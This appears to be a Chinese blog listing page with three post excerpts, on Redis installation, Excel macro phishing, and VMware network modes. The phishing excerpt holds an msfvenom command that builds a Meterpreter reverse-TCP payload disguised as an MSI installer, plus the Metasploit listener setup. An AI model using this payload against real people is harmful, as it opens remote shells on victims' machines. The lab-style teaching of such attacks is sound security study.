摘要:
redis部署 nosql系列 redis服务安装 wget http://download.redis.io/releases/redis-4.0.9.tar.gz tar zxvf redis-4.0.9.tar.gz mv ./redis-4.0.9 /usr/local/redis cd / 阅读全文
posted @ 2022-04-24 22:43
icui4cu
阅读(85)
评论(0)
推荐(0)
摘要:
excel宏钓鱼 生成木马 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.223.131 lport=4444 -f msi -o hack.msi 开始监听 msfconsole use exploit/multi/handle 阅读全文
posted @ 2022-04-24 22:42
icui4cu
阅读(90)
评论(0)
推荐(0)
摘要:
网络模式理解 Vmnet1和Vmnet2 在虚拟网络编辑器中有Vmnet1和Vmnet2,他们的区别为:网络模式不同、服务器不同、访问不同 网络模式不同 **Vmnet1:**Vmnet1采用的网络模式是Host-Only网络模式。 **Vmnet8:**Vmnet8采用的网络模式是NAT网络模式。 阅读全文
posted @ 2022-04-24 16:07
icui4cu
阅读(438)
评论(0)
推荐(0)